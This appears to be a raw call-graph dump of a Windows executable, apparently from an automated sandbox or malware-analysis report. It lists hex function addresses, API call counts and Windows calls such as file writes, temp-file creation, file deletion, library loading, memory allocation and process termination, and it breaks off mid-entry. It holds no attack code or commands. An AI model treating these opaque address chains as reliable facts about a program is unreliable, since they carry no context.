c17474 98511->98513 98514 bab567 39 API calls 98512->98514 98516 baa961 22 API calls 98513->98516 98548 c17554 98513->98548 98514->98513 98515 bbfddb 22 API calls 98517 c17587 98515->98517 98518 c17495 98516->98518 98519 bbfe0b 22 API calls 98517->98519 98520 baa961 22 API calls 98518->98520 98521 c17598 98519->98521 98522 c1749e 98520->98522 98523 ba6246 CloseHandle 98521->98523 98524 ba7510 53 API calls 98522->98524 98525 c175a3 98523->98525 98526 c174aa 98524->98526 98527 baa961 22 API calls 98525->98527 98528 ba525f 22 API calls 98526->98528 98529 c175ab 98527->98529 98530 c174bf 98528->98530 98531 ba6246 CloseHandle 98529->98531 98533 ba6350 22 API calls 98530->98533 98532 c175b2 98531->98532 98534 ba7510 53 API calls 98532->98534 98535 c174f2 98533->98535 98536 c175be 98534->98536 98537 c1754a 98535->98537 98539 c0d4ce 4 API calls 98535->98539 98538 ba6246 CloseHandle 98536->98538 98541 bab567 39 API calls 98537->98541 98540 c175c8 98538->98540 98542 c17502 98539->98542 98545 ba5745 5 API calls 98540->98545 98541->98548 98542->98537 98543 c17506 98542->98543 98544 ba9cb3 22 API calls 98543->98544 98546 c17513 98544->98546 98547 c175e2 98545->98547 99683 c0d2c1 26 API calls 98546->99683 98550 c175ea 98547->98550 98551 c176de GetLastError 98547->98551 98548->98515 98566 c176a4 98548->98566 98553 ba53de 27 API calls 98550->98553 98552 c176f7 98551->98552 99687 ba6216 CloseHandle ISource 98552->99687 98556 c175f8 98553->98556 98555 c1751c 98555->98537 99684 ba53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98556->99684 98558 c17645 98561 bbfddb 22 API calls 98558->98561 98559 c175ff 98559->98558 98560 c17619 98559->98560 99685 c0ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98560->99685 98562 c17679 98561->98562 98563 baa961 22 API calls 98562->98563 98565 c17686 98563->98565 98565->98566 99686 c0417d 22 API calls __fread_nolock 98565->99686 98566->98314 98569 ba7510 53 API calls 98568->98569 98570 c1f126 98569->98570 99688 ba9e90 98570->99688 98572 c1f136 98573 baec40 256 API calls 98572->98573 98574 c1f15b 98572->98574 98573->98574 98575 ba9c6e 22 API calls 98574->98575 98576 c1f15f 98574->98576 98575->98576 98576->98314 99725 c0dbbe lstrlenW 98577->99725 98581 c27f59 120 API calls 98580->98581 98582 c295af 98581->98582 98582->98314 98583->98309 98584->98277 98585->98279 98586->98289 98587->98301 98588->98301 98589->98275 98590->98314 98591->98314 98592->98314 98593->98312 98594->98314 98595->98342 98596->98340 98597->98344 98598->98339 98599->98369 98600->98369 98601->98364 98602->98364 98603->98368 98604->98364 98606 ba7522 98605->98606 98607 ba7525 98605->98607 98606->98385 98608 ba755b 98607->98608 98609 ba752d 98607->98609 98610 be50f6 98608->98610 98613 ba756d 98608->98613 98620 be500f 98608->98620 98826 bc51c6 26 API calls 98609->98826 98829 bc5183 26 API calls 98610->98829 98827 bbfb21 51 API calls 98613->98827 98614 ba753d 98618 bbfddb 22 API calls 98614->98618 98615 be510e 98615->98615 98619 ba7547 98618->98619 98621 ba9cb3 22 API calls 98619->98621 98622 be5088 98620->98622 98623 bbfe0b 22 API calls 98620->98623 98621->98606 98828 bbfb21 51 API calls 98622->98828 98624 be5058 98623->98624 98625 bbfddb 22 API calls 98624->98625 98626 be507f 98625->98626 98627 ba9cb3 22 API calls 98626->98627 98627->98622 98830 ba4e90 LoadLibraryA 98628->98830 98633 be3ccf 98635 ba4f39 68 API calls 98633->98635 98634 ba4ef6 LoadLibraryExW 98838 ba4e59 LoadLibraryA 98634->98838 98637 be3cd6 98635->98637 98639 ba4e59 3 API calls 98637->98639 98642 be3cde 98639->98642 98641 ba4f20 98641->98642 98643 ba4f2c 98641->98643 98860 ba50f5 98642->98860 98644 ba4f39 68 API calls 98643->98644 98646 ba4f31 98644->98646 98646->98386 98646->98389 98649 be3d05 98651 baa961 22 API calls 98650->98651 98652 ba5275 98651->98652 98653 baa961 22 API calls 98652->98653 98654 ba527d 98653->98654 98655 baa961 22 API calls 98654->98655 98656 ba5285 98655->98656 98657 baa961 22 API calls 98656->98657 98658 ba528d 98657->98658 98659 be3df5 98658->98659 98660 ba52c1 98658->98660 98661 baa8c7 22 API calls 98659->98661 98662 ba6d25 22 API calls 98660->98662 98663 be3dfe 98661->98663 98664 ba52cf 98662->98664 98665 baa6c3 22 API calls 98663->98665 98666 ba93b2 22 API calls 98664->98666 98669 ba5304 98665->98669 98667 ba52d9 98666->98667 98667->98669 98670 ba6d25 22 API calls 98667->98670 98668 ba5349 99094 ba6d25 98668->99094 98669->98668 98671 ba5325 98669->98671 98687 be3e20 98669->98687 98673 ba52fa 98670->98673 98671->98668 98676 ba4c6d 22 API calls 98671->98676 98675 ba93b2 22 API calls 98673->98675 98674 ba535a 98677 ba5370 98674->98677 98682 baa8c7 22 API calls 98674->98682 98675->98669 98679 ba5332 98676->98679 98678 ba5384 98677->98678 98683 baa8c7 22 API calls 98677->98683 98681 ba538f 98678->98681 98685 baa8c7 22 API calls 98678->98685 98679->98668 98684 ba6d25 22 API calls 98679->98684 98680 ba6b57 22 API calls 98689 be3ee0 98680->98689 98686 baa8c7 22 API calls 98681->98686 98691 ba539a 98681->98691 98682->98677 98683->98678 98684->98668 98685->98681 98686->98691 98687->98680 98688 ba4c6d 22 API calls 98688->98689 98689->98668 98689->98688 99107 ba49bd 22 API calls __fread_nolock 98689->99107 98691->98421 98693 baaec9 22 API calls 98692->98693 98694 ba4c78 98693->98694 98694->98425 98694->98426 98696 ba6362 98695->98696 98697 be4a51 98695->98697 99109 ba6373 98696->99109 99119 ba4a88 22 API calls __fread_nolock 98697->99119 98700 ba636e 98700->98434 98701 be4a5b 98702 be4a67 98701->98702 98703 baa8c7 22 API calls 98701->98703 98703->98702 98705 c0d7d8 98704->98705 98706 c0d7f3 98705->98706 98707 c0d7dd 98705->98707 98708 baa961 22 API calls 98706->98708 98709 baa8c7 22 API calls 98707->98709 98711 c0d7ee 98707->98711 98710 c0d7fb 98708->98710 98709->98711 98712 baa961 22 API calls 98710->98712 98711->98442 98713 c0d803 98712->98713 98714 baa961 22 API calls 98713->98714 98715 c0d80e 98714->98715 98716 baa961 22 API calls 98715->98716 98717 c0d816 98716->98717 98718 baa961 22 API calls 98717->98718 98719 c0d81e 98718->98719 98720 baa961 22 API calls 98719->98720 98721 c0d826 98720->98721 98722 baa961 22 API calls 98721->98722 98723 c0d82e 98722->98723 98724 baa961 22 API calls 98723->98724 98725 c0d836 98724->98725 98726 ba525f 22 API calls 98725->98726 98727 c0d84d 98726->98727 98728 ba525f 22 API calls 98727->98728 98729 c0d866 98728->98729 98730 ba4c6d 22 API calls 98729->98730 98731 c0d872 98730->98731 98732 c0d885 98731->98732 98734 ba93b2 22 API calls 98731->98734 98733 ba4c6d 22 API calls 98732->98733 98735 c0d88e 98733->98735 98734->98732 98736 c0d89e 98735->98736 98737 ba93b2 22 API calls 98735->98737 98738 c0d8b0 98736->98738 98739 baa8c7 22 API calls 98736->98739 98737->98736 98740 ba6350 22 API calls 98738->98740 98739->98738 98741 c0d8bb 98740->98741 99120 c0d978 22 API calls 98741->99120 98743 c0d8ca 99121 c0d978 22 API calls 98743->99121 98745 c0d8dd 98746 ba4c6d 22 API calls 98745->98746 98747 c0d8e7 98746->98747 98748 c0d8ec 98747->98748 98749 c0d8fe 98747->98749 98750 ba33c6 22 API calls 98748->98750 98751 ba4c6d 22 API calls 98749->98751 98752 c0d8f9 98750->98752 98753 c0d907 98751->98753 98756 ba6350 22 API calls 98752->98756 98754 c0d925 98753->98754 98755 ba33c6 22 API calls 98753->98755 98757 ba6350 22 API calls 98754->98757 98755->98752 98756->98754 98757->98711 98759 c12954 __wsopen_s 98758->98759 98760 bbfe0b 22 API calls 98759->98760 98761 c12971 98760->98761 98762 ba5722 22 API calls 98761->98762 98763 c1297b 98762->98763 99122 c1274e 98763->99122 98765 c12986 98766 ba511f 64 API calls 98765->98766 98767 c1299b 98766->98767 98768 c12a6c 98767->98768 98769 c129bf 98767->98769 99154 c12e66 75 API calls 98768->99154 99151 c12e66 75 API calls 98769->99151 98772 c12a38 98775 ba50f5 40 API calls 98772->98775 98778 c12a75 ISource 98772->98778 98773 c129c4 98773->98778 99152 bcd583 26 API calls 98773->99152 98776 c12a91 98775->98776 98777 ba50f5 40 API calls 98776->98777 98780 c12aa1 98777->98780 98778->98449 98779 c129ed 99153 bcd583 26 API calls 98779->99153 98781 ba50f5 40 API calls 98780->98781 98783 c12abc 98781->98783 98784 ba50f5 40 API calls 98783->98784 98785 c12acc 98784->98785 98786 ba50f5 40 API calls 98785->98786 98787 c12ae7 98786->98787 98788 ba50f5 40 API calls 98787->98788 98789 c12af7 98788->98789 98790 ba50f5 40 API calls 98789->98790 98791 c12b07 98790->98791 98792 ba50f5 40 API calls 98791->98792 98793 c12b17 98792->98793 99125 c13017 GetTempPathW GetTempFileNameW 98793->99125 98795 c12b22 98796 bce5eb 29 API calls 98795->98796 98807 c12b33 98796->98807 98797 c12bed 99135 bce678 98797->99135 98799 c12bf8 98801 c12c12 98799->98801 98802 c12bfe DeleteFileW 98799->98802 98800 ba50f5 40 API calls 98800->98807 98803 c12c91 CopyFileW 98801->98803 98809 c12c18 98801->98809 98802->98778 98804 c12ca7 DeleteFileW 98803->98804 98805 c12cb9 DeleteFileW 98803->98805 98804->98778 99148 c12fd8 CreateFileW 98805->99148 98807->98778 98807->98797 98807->98800 99126 bcdbb3 98807->99126 99155 c122ce 98809->99155 98812 c12c80 DeleteFileW 98812->98778 98814 bab578 98813->98814 98815 bab57f 98813->98815 98814->98815 99454 bc62d1 39 API calls _strftime 98814->99454 98815->98376 98817 bab5c2 98817->98376 98818->98410 98819->98423 98821 ba4f4a 98820->98821 98822 ba4f43 98820->98822 98824 ba4f6a FreeLibrary 98821->98824 98825 ba4f59 98821->98825 98823 bce678 67 API calls 98822->98823 98823->98821 98824->98825 98825->98450 98826->98614 98827->98614 98828->98610 98829->98615 98831 ba4ea8 GetProcAddress 98830->98831 98832 ba4ec6 98830->98832 98833 ba4eb8 98831->98833 98835 bce5eb 98832->98835 98833->98832 98834 ba4ebf FreeLibrary 98833->98834 98834->98832 98866 bce52a 98835->98866 98837 ba4eea 98837->98633 98837->98634 98839 ba4e6e GetProcAddress 98838->98839 98840 ba4e8d 98838->98840 98841 ba4e7e 98839->98841 98843 ba4f80 98840->98843 98841->98840 98842 ba4e86 FreeLibrary 98841->98842 98842->98840 98844 bbfe0b 22 API calls 98843->98844 98845 ba4f95 98844->98845 98846 ba5722 22 API calls 98845->98846 98847 ba4fa1 __fread_nolock 98846->98847 98848 be3d1d 98847->98848 98849 ba50a5 98847->98849 98859 ba4fdc 98847->98859 98931 c1304d 74 API calls 98848->98931 98920 ba42a2 CreateStreamOnHGlobal 98849->98920 98852 be3d22 98854 ba511f 64 API calls 98852->98854 98853 ba50f5 40 API calls 98853->98859 98855 be3d45 98854->98855 98856 ba50f5 40 API calls 98855->98856 98857 ba506e ISource 98856->98857 98857->98641 98859->98852 98859->98853 98859->98857 98926 ba511f 98859->98926 98861 ba5107 98860->98861 98862 be3d70 98860->98862 98953 bce8c4 98861->98953 98865 c128fe 27 API calls 98865->98649 98869 bce536 BuildCatchObjectHelperInternal 98866->98869 98867 bce544 98891 bcf2d9 20 API calls __dosmaperr 98867->98891 98869->98867 98870 bce574 98869->98870 98872 bce579 98870->98872 98873 bce586 98870->98873 98871 bce549 98892 bd27ec 26 API calls __wsopen_s 98871->98892 98893 bcf2d9 20 API calls __dosmaperr 98872->98893 98883 bd8061 98873->98883 98877 bce58f 98879 bce595 98877->98879 98880 bce5a2 98877->98880 98878 bce554 __wsopen_s 98878->98837 98894 bcf2d9 20 API calls __dosmaperr 98879->98894 98895 bce5d4 LeaveCriticalSection __fread_nolock 98880->98895 98884 bd806d BuildCatchObjectHelperInternal 98883->98884 98896 bd2f5e EnterCriticalSection 98884->98896 98886 bd807b 98897 bd80fb 98886->98897 98890 bd80ac __wsopen_s 98890->98877 98891->98871 98892->98878 98893->98878 98894->98878 98895->98878 98896->98886 98904 bd811e 98897->98904 98898 bd8177 98916 bd4c7d 20 API calls __dosmaperr 98898->98916 98900 bd8180 98902 bd29c8 _free 20 API calls 98900->98902 98903 bd8189 98902->98903 98905 bd8088 98903->98905 98917 bd3405 11 API calls 2 library calls 98903->98917 98904->98898 98904->98905 98914 bc918d EnterCriticalSection 98904->98914 98915 bc91a1 LeaveCriticalSection 98904->98915 98911 bd80b7 98905->98911 98908 bd81a8 98918 bc918d EnterCriticalSection 98908->98918 98910 bd81bb 98910->98905 98919 bd2fa6 LeaveCriticalSection 98911->98919 98913 bd80be 98913->98890 98914->98904 98915->98904 98916->98900 98917->98908 98918->98910 98919->98913 98921 ba42bc FindResourceExW 98920->98921 98925 ba42d9 98920->98925 98922 be35ba LoadResource 98921->98922 98921->98925 98923 be35cf SizeofResource 98922->98923 98922->98925 98924 be35e3 LockResource 98923->98924 98923->98925 98924->98925 98925->98859 98927 ba512e 98926->98927 98928 be3d90 98926->98928 98932 bcece3 98927->98932 98931->98852 98935 bceaaa 98932->98935 98934 ba513c 98934->98859 98936 bceab6 BuildCatchObjectHelperInternal 98935->98936 98937 bceac2 98936->98937 98939 bceae8 98936->98939 98948 bcf2d9 20 API calls __dosmaperr 98937->98948 98950 bc918d EnterCriticalSection 98939->98950 98940 bceac7 98949 bd27ec 26 API calls __wsopen_s 98940->98949 98943 bceaf4 98951 bcec0a 62 API calls 2 library calls 98943->98951 98945 bceb08 98952 bceb27 LeaveCriticalSection __fread_nolock 98945->98952 98947 bcead2 __wsopen_s 98947->98934 98948->98940 98949->98947 98950->98943 98951->98945 98952->98947 98956 bce8e1 98953->98956 98955 ba5118 98955->98865 98957 bce8ed BuildCatchObjectHelperInternal 98956->98957 98958 bce92d 98957->98958 98959 bce925 __wsopen_s 98957->98959 98961 bce900 ___scrt_fastfail 98957->98961 98969 bc918d EnterCriticalSection 98958->98969 98959->98955 98983 bcf2d9 20 API calls __dosmaperr 98961->98983 98962 bce937 98970 bce6f8 98962->98970 98965 bce91a 98984 bd27ec 26 API calls __wsopen_s 98965->98984 98969->98962 98971 bce727 98970->98971 98974 bce70a ___scrt_fastfail 98970->98974 98985 bce96c LeaveCriticalSection __fread_nolock 98971->98985 98972 bce717 99058 bcf2d9 20 API calls __dosmaperr 98972->99058 98974->98971 98974->98972 98976 bce76a __fread_nolock 98974->98976 98976->98971 98977 bce886 ___scrt_fastfail 98976->98977 98986 bcd955 98976->98986 98993 bd8d45 98976->98993 99060 bccf78 26 API calls 4 library calls 98976->99060 99061 bcf2d9 20 API calls __dosmaperr 98977->99061 98981 bce71c 99059 bd27ec 26 API calls __wsopen_s 98981->99059 98983->98965 98984->98959 98985->98959 98987 bcd976 98986->98987 98988 bcd961 98986->98988 98987->98976 99062 bcf2d9 20 API calls __dosmaperr 98988->99062 98990 bcd966 99063 bd27ec 26 API calls __wsopen_s 98990->99063 98992 bcd971 98992->98976 98994 bd8d6f 98993->98994 98995 bd8d57 98993->98995 98996 bd90d9 98994->98996 99001 bd8db4 98994->99001 99073 bcf2c6 20 API calls __dosmaperr 98995->99073 99088 bcf2c6 20 API calls __dosmaperr 98996->99088 98998 bd8d5c 99074 bcf2d9 20 API calls __dosmaperr 98998->99074 99000 bd90de 99089 bcf2d9 20 API calls __dosmaperr 99000->99089 99004 bd8dbf 99001->99004 99007 bd8d64 99001->99007 99011 bd8def 99001->99011 99075 bcf2c6 20 API calls __dosmaperr 99004->99075 99005 bd8dcc 99090 bd27ec 26 API calls __wsopen_s 99005->99090 99007->98976 99008 bd8dc4 99076 bcf2d9 20 API calls __dosmaperr 99008->99076 99012 bd8e08 99011->99012 99013 bd8e2e 99011->99013 99014 bd8e4a 99011->99014 99012->99013 99020 bd8e15 99012->99020 99077 bcf2c6 20 API calls __dosmaperr 99013->99077 99017 bd3820 __fread_nolock 21 API calls 99014->99017 99016 bd8e33 99078 bcf2d9 20 API calls __dosmaperr 99016->99078 99021 bd8e61 99017->99021 99064 bdf89b 99020->99064 99024 bd29c8 _free 20 API calls 99021->99024 99022 bd8e3a 99079 bd27ec 26 API calls __wsopen_s 99022->99079 99023 bd8fb3 99026 bd9029 99023->99026 99030 bd8fcc GetConsoleMode 99023->99030 99027 bd8e6a 99024->99027 99029 bd902d ReadFile 99026->99029 99028 bd29c8 _free 20 API calls 99027->99028 99031 bd8e71 99028->99031 99032 bd9047 99029->99032 99033 bd90a1 GetLastError 99029->99033 99030->99026 99034 bd8fdd 99030->99034 99035 bd8e7b 99031->99035 99036 bd8e96 99031->99036 99032->99033 99039 bd901e 99032->99039 99037 bd90ae 99033->99037 99038 bd9005 99033->99038 99034->99029 99040 bd8fe3 ReadConsoleW 99034->99040 99080 bcf2d9 20 API calls __dosmaperr 99035->99080 99082 bd9424 28 API calls __fread_nolock 99036->99082 99086 bcf2d9 20 API calls __dosmaperr 99037->99086 99056 bd8e45 __fread_nolock 99038->99056 99083 bcf2a3 20 API calls __dosmaperr 99038->99083 99051 bd906c 99039->99051 99052 bd9083 99039->99052 99039->99056 99040->99039 99045 bd8fff GetLastError 99040->99045 99041 bd29c8 _free 20 API calls 99041->99007 99045->99038 99046 bd8e80 99081 bcf2c6 20 API calls __dosmaperr 99046->99081 99047 bd90b3 99087 bcf2c6 20 API calls __dosmaperr 99047->99087 99084 bd8a61 31 API calls 2 library calls 99051->99084 99054 bd909a 99052->99054 99052->99056 99085 bd88a1 29 API calls __fread_nolock 99054->99085 99056->99041 99057 bd909f 99057->99056 99058->98981 99059->98971 99060->98976 99061->98981 99062->98990 99063->98992 99065 bdf8a8 99064->99065 99066 bdf8b5 99064->99066 99091 bcf2d9 20 API calls __dosmaperr 99065->99091 99069 bdf8c1 99066->99069 99092 bcf2d9 20 API calls __dosmaperr 99066->99092 99068 bdf8ad 99068->99023 99069->99023 99071 bdf8e2 99093 bd27ec 26 API calls __wsopen_s 99071->99093 99073->98998 99074->99007 99075->99008 99076->99005 99077->99016 99078->99022 99079->99056 99080->99046 99081->99056 99082->99020 99083->99056 99084->99056 99085->99057 99086->99047 99087->99056 99088->99000 99089->99005 99090->99007 99091->99068 99092->99071 99093->99068 99095 ba6d91 99094->99095 99096 ba6d34 99094->99096 99098 ba93b2 22 API calls 99095->99098 99096->99095 99097 ba6d3f 99096->99097 99100 ba6d5a 99097->99100 99101 be4c9d 99097->99101 99099 ba6d62 __fread_nolock 99098->99099 99099->98674 99108 ba6f34 22 API calls 99100->99108 99103 bbfddb 22 API calls 99101->99103 99104 be4ca7 99103->99104 99105 bbfe0b 22 API calls 99104->99105 99106 be4cda 99105->99106 99107->98689 99108->99099 99110 ba63b6 __fread_nolock 99109->99110 99111 ba6382 99109->99111 99110->98700 99111->99110 99112 be4a82 99111->99112 99113 ba63a9 99111->99113 99115 bbfddb 22 API calls 99112->99115 99114 baa587 22 API calls 99113->99114 99114->99110 99116 be4a91 99115->99116 99117 bbfe0b 22 API calls 99116->99117 99118 be4ac5 __fread_nolock 99117->99118 99119->98701 99120->98743 99121->98745 99184 bce4e8 99122->99184 99124 c1275d 99124->98765 99125->98795 99127 bcdbc1 99126->99127 99133 bcdbdd 99126->99133 99128 bcdbcd 99127->99128 99129 bcdbe3 99127->99129 99127->99133 99201 bcf2d9 20 API calls __dosmaperr 99128->99201 99198 bcd9cc 99129->99198 99132 bcdbd2 99202 bd27ec 26 API calls __wsopen_s 99132->99202 99133->98807 99136 bce684 BuildCatchObjectHelperInternal 99135->99136 99137 bce6aa 99136->99137 99138 bce695 99136->99138 99147 bce6a5 __wsopen_s 99137->99147 99336 bc918d EnterCriticalSection 99137->99336 99353 bcf2d9 20 API calls __dosmaperr 99138->99353 99141 bce69a 99354 bd27ec 26 API calls __wsopen_s 99141->99354 99142 bce6c6 99337 bce602 99142->99337 99145 bce6d1 99355 bce6ee LeaveCriticalSection __fread_nolock 99145->99355 99147->98799 99149 c13013 99148->99149 99150 c12fff SetFileTime CloseHandle 99148->99150 99149->98778 99150->99149 99151->98773 99152->98779 99153->98772 99154->98772 99156 c122d9 99155->99156 99157 c122e7 99155->99157 99158 bce5eb 29 API calls 99156->99158 99159 c1232c 99157->99159 99160 bce5eb 29 API calls 99157->99160 99176 c122f0 99157->99176 99158->99157 99429 c12557 99159->99429 99161 c12311 99160->99161 99161->99159 99163 c1231a 99161->99163 99167 bce678 67 API calls 99163->99167 99163->99176 99164 c12370 99165 c12395 99164->99165 99166 c12374 99164->99166 99433 c12171 99165->99433 99169 c12381 99166->99169 99171 bce678 67 API calls 99166->99171 99167->99176 99172 bce678 67 API calls 99169->99172 99169->99176 99171->99169 99172->99176 99176->98805 99176->98812 99187 bce469 99184->99187 99186 bce505 99186->99124 99188 bce48c 99187->99188 99189 bce478 99187->99189 99194 bce488 __alldvrm 99188->99194 99197 bd333f 11 API calls 2 library calls 99188->99197 99195 bcf2d9 20 API calls __dosmaperr 99189->99195 99191 bce47d 99196 bd27ec 26 API calls __wsopen_s 99191->99196 99194->99186 99195->99191 99196->99194 99197->99194 99203 bcd97b 99198->99203 99201->99132 99202->99133 99204 bcd987 BuildCatchObjectHelperInternal 99203->99204 99211 bc918d EnterCriticalSection 99204->99211 99206 bcd995 99212 bcd9f4 99206->99212 99211->99206 99220 bd49a1 99212->99220 99218 bcd9a2 99221 bcd955 __fread_nolock 26 API calls 99220->99221 99222 bd49b0 99221->99222 99223 bdf89b __fread_nolock 26 API calls 99222->99223 99224 bd49b6 99223->99224 99225 bcda09 99224->99225 99226 bd3820 __fread_nolock 21 API calls 99224->99226 99229 bcda3a 99225->99229 99227 bd4a15 99226->99227 99228 bd29c8 _free 20 API calls 99227->99228 99228->99225 99232 bcda4c 99229->99232 99235 bcda24 99229->99235 99230 bcda5a 99266 bcf2d9 20 API calls __dosmaperr 99230->99266 99232->99230 99232->99235 99239 bcda85 __fread_nolock 99232->99239 99240 bd4a56 62 API calls 99235->99240 99237 bcd955 __fread_nolock 26 API calls 99237->99239 99239->99235 99239->99237 99241 bd59be 99239->99241 99268 bcdc0b 99239->99268 99240->99218 99336->99142 99338 bce60f 99337->99338 99339 bce624 99337->99339 99375 bcf2d9 20 API calls __dosmaperr 99338->99375 99342 bcdc0b 62 API calls 99339->99342 99345 bce61f 99339->99345 99341 bce614 99376 bd27ec 26 API calls __wsopen_s 99341->99376 99344 bce638 99342->99344 99356 bd4d7a 99344->99356 99345->99145 99348 bcd955 __fread_nolock 26 API calls 99349 bce646 99348->99349 99360 bd862f 99349->99360 99353->99141 99354->99147 99355->99147 99357 bce640 99356->99357 99358 bd4d90 99356->99358 99357->99348 99358->99357 99359 bd29c8 _free 20 API calls 99358->99359 99359->99357 99361 bd863e 99360->99361 99362 bd8653 99360->99362 99380 bcf2c6 20 API calls __dosmaperr 99361->99380 99364 bd868e 99362->99364 99368 bd867a 99362->99368 99382 bcf2c6 20 API calls __dosmaperr 99364->99382 99365 bd8643 99381 bcf2d9 20 API calls __dosmaperr 99365->99381 99377 bd8607 99368->99377 99369 bd8693 99375->99341 99376->99345 99385 bd8585 99377->99385 99380->99365 99382->99369 99430 c1257c 99429->99430 99432 c12565 __fread_nolock 99429->99432 99431 bce8c4 __fread_nolock 40 API calls 99430->99431 99431->99432 99432->99164 99434 bcea0c ___std_exception_copy 21 API calls 99433->99434 99435 c1217f 99434->99435 99436 bcea0c ___std_exception_copy 21 API calls 99435->99436 99454->98817 99456 ba7510 53 API calls 99455->99456 99457 c27f90 99456->99457 99482 c27fd5 ISource 99457->99482 99493 c28cd3 99457->99493 99459 c28281 99460 c2844f 99459->99460 99465 c2828f 99459->99465 99534 c28ee4 60 API calls 99460->99534 99463 c2845e 99463->99465 99466 c2846a 99463->99466 99464 ba7510 53 API calls 99480 c28049 99464->99480 99506 c27e86 99465->99506 99466->99482 99471 c282c8 99521 bbfc70 99471->99521 99474 c28302 99528 ba63eb 22 API calls 99474->99528 99475 c282e8 99527 c1359c 82 API calls __wsopen_s 99475->99527 99478 c282f3 GetCurrentProcess TerminateProcess 99478->99474 99479 c28311 99529 ba6a50 22 API calls 99479->99529 99480->99459 99480->99464 99480->99482 99525 c0417d 22 API calls __fread_nolock 99480->99525 99526 c2851d 42 API calls _strftime 99480->99526 99482->98453 99483 c2832a 99491 c28352 99483->99491 99530 bb04f0 22 API calls 99483->99530 99484 c284c5 99484->99482 99489 c284d9 FreeLibrary 99484->99489 99486 c28341 99531 c28b7b 75 API calls 99486->99531 99489->99482 99491->99484 99532 bb04f0 22 API calls 99491->99532 99533 baaceb 23 API calls ISource 99491->99533 99535 c28b7b 75 API calls 99491->99535 99494 baaec9 22 API calls 99493->99494 99495 c28cee CharLowerBuffW 99494->99495 99536 c08e54 99495->99536 99499 baa961 22 API calls 99500 c28d2a 99499->99500 99501 ba6d25 22 API calls 99500->99501 99502 c28d3e 99501->99502 99503 ba93b2 22 API calls 99502->99503 99505 c28d48 _wcslen 99503->99505 99504 c28e5e _wcslen 99504->99480 99505->99504 99543 c2851d 42 API calls _strftime 99505->99543 99507 c27ea1 99506->99507 99511 c27eec 99506->99511 99508 bbfe0b 22 API calls 99507->99508 99509 c27ec3 99508->99509 99510 bbfddb 22 API calls 99509->99510 99509->99511 99510->99509 99512 c29096 99511->99512 99513 c292ab ISource 99512->99513 99520 c290ba _strcat _wcslen 99512->99520 99513->99471 99514 bab567 39 API calls 99514->99520 99515 bab38f 39 API calls 99515->99520 99516 bab6b5 39 API calls 99516->99520 99517 ba7510 53 API calls 99517->99520 99518 bcea0c 21 API calls ___std_exception_copy 99518->99520 99520->99513 99520->99514 99520->99515 99520->99516 99520->99517 99520->99518 99546 c0efae 24 API calls _wcslen 99520->99546 99522 bbfc85 99521->99522 99523 bbfd1d VirtualAlloc 99522->99523 99524 bbfceb 99522->99524 99523->99524 99524->99474 99524->99475 99525->99480 99526->99480 99527->99478 99528->99479 99529->99483 99530->99486 99531->99491 99532->99491 99533->99491 99534->99463 99535->99491 99538 c08e74 _wcslen 99536->99538 99537 c08f63 99537->99499 99537->99505 99538->99537 99539 c08ea9 99538->99539 99541 c08f68 99538->99541 99539->99537 99544 bbce60 41 API calls 99539->99544 99541->99537 99545 bbce60 41 API calls 99541->99545 99543->99504 99544->99539 99545->99541 99546->99520 99548 ba9c7e 99547->99548 99549 bef545 99547->99549 99554 bbfddb 22 API calls 99548->99554 99550 bef556 99549->99550 99552 ba6b57 22 API calls 99549->99552 99551 baa6c3 22 API calls 99550->99551 99553 bef560 99551->99553 99552->99550 99553->99553 99555 ba9c91 99554->99555 99556 ba9c9a 99555->99556 99557 ba9cac 99555->99557 99558 ba9cb3 22 API calls 99556->99558 99559 baa961 22 API calls 99557->99559 99560 ba9ca2 99558->99560 99559->99560 99560->98457 99560->98461 99620 ba54c6 99561->99620 99564 ba54c6 3 API calls 99565 bbfa9a 99564->99565 99565->98478 99567 bbfe0b 22 API calls 99566->99567 99568 ba6295 99567->99568 99569 bbfddb 22 API calls 99568->99569 99570 ba62a3 99569->99570 99571 bbf141 99570->99571 99572 bbf188 99571->99572 99573 bbf14c 99571->99573 99574 baa6c3 22 API calls 99572->99574 99573->99572 99575 bbf15b 99573->99575 99581 c0caeb 99574->99581 99576 bbf170 99575->99576 99578 bbf17d 99575->99578 99626 bbf18e 99576->99626 99633 c0cbf2 26 API calls 99578->99633 99579 c0cb1a 99579->98493 99581->99579 99634 c0ca89 ReadFile SetFilePointerEx 99581->99634 99635 ba49bd 22 API calls __fread_nolock 99581->99635 99582 bbf179 99582->98493 99586 ba625f 99585->99586 99587 ba6250 99585->99587 99586->99587 99588 ba6264 CloseHandle 99586->99588 99587->98467 99588->99587 99590 ba575c CreateFileW 99589->99590 99591 be4035 99589->99591 99593 ba577b 99590->99593 99592 be403b CreateFileW 99591->99592 99591->99593 99592->99593 99594 be4063 99592->99594 99593->98488 99593->98492 99595 ba54c6 3 API calls 99594->99595 99596 be406e 99595->99596 99596->99593 99598 ba53f3 99597->99598 99611 ba53f0 ISource 99597->99611 99599 ba54c6 3 API calls 99598->99599 99598->99611 99600 ba5410 99599->99600 99601 be3f4b 99600->99601 99602 ba541d 99600->99602 99603 bbfa5b 3 API calls 99601->99603 99604 bbfe0b 22 API calls 99602->99604 99603->99611 99605 ba5429 99604->99605 99606 ba5722 22 API calls 99605->99606 99607 ba5433 99606->99607 99608 ba9a40 2 API calls 99607->99608 99609 ba543f 99608->99609 99610 ba54c6 3 API calls 99609->99610 99610->99611 99611->98498 99612->98504 99613->98502 99614->98505 99615->98509 99616->98461 99617->98461 99618->98495 99619->98499 99625 ba54dd 99620->99625 99621 be3f9c SetFilePointerEx 99622 ba5564 SetFilePointerEx SetFilePointerEx 99623 ba5530 99622->99623 99623->99564 99624 be3f8b 99624->99621 99625->99621 99625->99622 99625->99623 99625->99624 99636 bbf1d8 99626->99636 99632 bbf1c1 99632->99582 99633->99582 99634->99581 99635->99581 99637 bbfe0b 22 API calls 99636->99637 99638 bbf1ef 99637->99638 99639 bbfddb 22 API calls 99638->99639 99640 bbf1a6 99639->99640 99641 ba97b6 99640->99641 99655 ba9a1e 99641->99655 99644 ba97c7 99646 ba97fc 99644->99646 99662 ba9a40 99644->99662 99668 ba9b01 22 API calls __fread_nolock 99644->99668 99646->99632 99647 ba6e14 MultiByteToWideChar 99646->99647 99648 ba6e40 99647->99648 99649 ba6e87 99647->99649 99650 bbfe0b 22 API calls 99648->99650 99651 baa6c3 22 API calls 99649->99651 99652 ba6e55 MultiByteToWideChar 99650->99652 99654 ba6e7b 99651->99654 99670 ba6e90 99652->99670 99654->99632 99656 ba9a2f 99655->99656 99657 bef378 99655->99657 99656->99644 99658 bbfddb 22 API 